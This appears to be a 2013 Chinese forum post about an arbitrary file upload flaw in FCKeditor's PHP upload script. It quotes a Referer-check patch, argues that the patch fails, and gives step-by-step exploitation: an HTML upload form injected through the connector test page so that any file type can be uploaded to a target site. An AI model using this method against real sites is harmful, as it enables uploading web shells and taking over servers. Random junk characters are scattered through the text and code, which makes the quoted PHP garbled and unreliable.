漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php5 D, s2 c. ~ u/ N; I( X5 y
网上给出的修复方案是
# i) j2 w! w3 H8 v; `2 o修复方法,删除FCK编辑器用其他的编辑器5 y( [. x" E! E8 b+ f
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件0 p- l+ K9 G: Z# |
在
5 F# {" t/ N! t7 [' K8 b# orequire(‘config.php’);# Z1 t) C' [1 i2 \0 k+ b6 ~4 |
require(‘util.php’);
3 B" A9 k6 u( B' B% R的下面添加以下代码—————————–
& m( w$ [7 ~/ A/ G//防止外部提交
+ Y) Q& d% ^# T% m1 dfunction outsidepost()( g2 g2 y6 Y) y1 B
{9 U% [, _ k' j4 ?' M1 ]
$servername=$_SERVER['SERVER_NAME'];
, a. }7 s3 r( f( C$sub_from=@$_SERVER['HTTP_REFERER'];
' p- L1 O/ z) q- Q5 t$sub_len=strlen($servername);' t/ E, e7 Y% _# N) f0 {* g
$checkfrom=substr($sub_from,7,$sub_len);) W' z l w# A+ S. O, u
if($checkfrom!=$servername){7 K6 e3 R% u, A5 c( z7 p- s7 T
echo(“you don’t outsidepost!”);
$ Y/ X& x% @/ E3 i) iexit;
* w1 R1 \. w( `}
" @& v/ c: O' t& y, z2 V4 w& `}7 W9 a& ^# S7 U5 T9 K
outsidepost();
0 N7 t* ^* O8 X' F( P ]防止外部提交,但是没有防止内部提交,3 p5 I. p5 e; ~1 H' S( H6 Q
利用方法:( c& m& a2 ?: D2 J6 O& i$ N
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html6 l) h( J5 }+ \) [
2,在Current Folder 框输入
% L' v/ b& T# D+ l2 _' Q+ M<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
6 [" O$ t! c; K$ y/ ]然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
$ `+ w% K, ]% mPS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对